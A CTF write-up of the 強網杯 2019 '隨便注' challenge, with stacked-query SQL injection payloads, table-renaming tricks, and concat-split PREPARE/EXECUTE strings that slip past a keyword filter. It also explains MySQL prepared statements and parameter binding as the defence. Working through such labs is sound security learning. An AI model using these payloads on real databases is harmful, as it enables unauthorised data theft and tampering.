1' and '0,1' and '1 : closing the single quote
1' order by 3--+ : guessing the number of columns
1' union select 1,database()# : starting the injection, and discovering a regex filter
1' and extractvalue(0x0a,concat(0x0a,(database())))# : database name : supersqli
0';show databases;# : after trying a pile of things, found stacked injection
0';show tables;#
Then I got lost: how do you get the columns out of a table? Only after looking it up did I learn that show can list columns as well.
0';show columns from words;#
0';show columns from `1919810931114514`;#
OK, at this point this noob was really stumped, so here is a writeup from a master: 強網杯2019隨便注
Reproducing it
1. Rename the words table to word1 or any other name : rename table words to new_word;
2. Rename 1919810931114514 to words : rename table 1919810931114514 to new_19198;
3. Add a column named id to the new words table : alter table new_19198 add id int unsigned not Null auto_increment primary key;
4. Rename the flag column to data : alert table new_19198 change flag data varchar(100);
1’;rename table words to new_word;rename table 1919810931114514 to new_19198;alter table new_19198 add id int unsigned not Null auto_increment primary key; alert table new_19198 change flag data varchar(100);#
1' or 1#
Huh o(TヘTo)? Dead? Even the master's payload didn't work, which is confusing, but this method is really neat and worth learning.
1’;rename table words to word1;rename table 1919810931114514 to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#
Reproduction two: BUUCTF-強網杯-隨便注:
1';set @a=concat("sel","ect flag from `1919810931114514`");prepare hello from @a;execute hello;#
1';sEt+@a=concat("sel","ect+flag+from+`1919810931114514`");PRepare+hello+from+@a;execute+hello;#
Finally succeeded, life is hard Orz.
How to use Prepare, execute and deallocate in MySQL
Using MySQL prepared statements: prepare, execute, deallocate
MySQL SQL preprocessing (Prepared statements)
PHP MySQL prepared statements
- PREPARE: prepare an SQL statement and assign it a name so it can be called later
- EXECUTE: run the prepared statement
- DEALLOCATE PREPARE: release the prepared statement
- In the SQL statement we use question marks (?), which can be replaced by integers, strings, doubles and booleans.
Usage:
PREPARE stmt_name FROM preparable_stmt
EXECUTE stmt_name [USING @var_name [, @var_name] ...]
{DEALLOCATE | DROP} PREPARE stmt_name
I think of it like a function: prepare defines the function, set sets its arguments, execute passes the arguments in and runs it, and things like @a are just variable names. Remember to release them when you are done.
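The full PREPARE / EXECUTE / DEALLOCATE lifecycle with a `?` placeholder, as an added example that is not from the writeup or the challenge. The table `demo_words` and its rows are constructed here for illustration. It also shows the point that matters for defence: a `?` bound through USING is data, whereas PREPARE FROM a string assembled from untrusted input is plain dynamic SQL, which is exactly why the concat() trick gets past a keyword filter.

```sql
-- Constructed demo table (not the challenge's table)
CREATE TABLE demo_words (id INT PRIMARY KEY, data VARCHAR(100));
INSERT INTO demo_words VALUES (1, 'hello'), (2, 'world');

-- 1. PREPARE parses the statement once; `?` marks a parameter slot.
PREPARE find_word FROM 'SELECT id, data FROM demo_words WHERE data = ?';

-- 2. SET puts the caller's value into a user variable.
SET @wanted = 'world';

-- 3. EXECUTE ... USING binds the variable to `?`.
--    Returns one row: (2, 'world')
EXECUTE find_word USING @wanted;

-- A value that looks like injection stays a plain string when bound this way:
-- it is compared against the data column and matches nothing.
SET @wanted = ''' OR ''1''=''1';
EXECUTE find_word USING @wanted;   -- returns no rows

-- Contrast: the statement text itself comes from a variable here, so whatever
-- was concatenated into @sql_text is parsed as SQL. Binding protects values,
-- never the statement text. This is the same shape as the challenge payload.
SET @sql_text = CONCAT('SELECT id, data FROM demo_words WHERE id = ', '1');
PREPARE dyn FROM @sql_text;
EXECUTE dyn;                       -- returns (1, 'hello')

-- 4. DEALLOCATE releases both handles. Prepared statements are per session and
--    counted against max_prepared_stmt_count, so leaking them eventually fails.
DEALLOCATE PREPARE find_word;
DEALLOCATE PREPARE dyn;
DROP TABLE demo_words;
```

Run it in a MySQL session as one script. The practical takeaway for application code is the same as the PHP prepared-statement reference above: let the driver bind user input into `?` slots, and never build the statement text with string concatenation, since PREPARE FROM @var gives a keyword blacklist nothing to catch.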
Also, the master who came up with this method is seriously awesome (ttql)!!!
set @a=concat("sel","ect"," group_con","cat(table_n","ame) ","fro","m"," infor","mation_sc","hema.tabl","es"," whe","re tabl","e_","sche","ma=datab","ase()");
prepare dump from @a;
execute dump;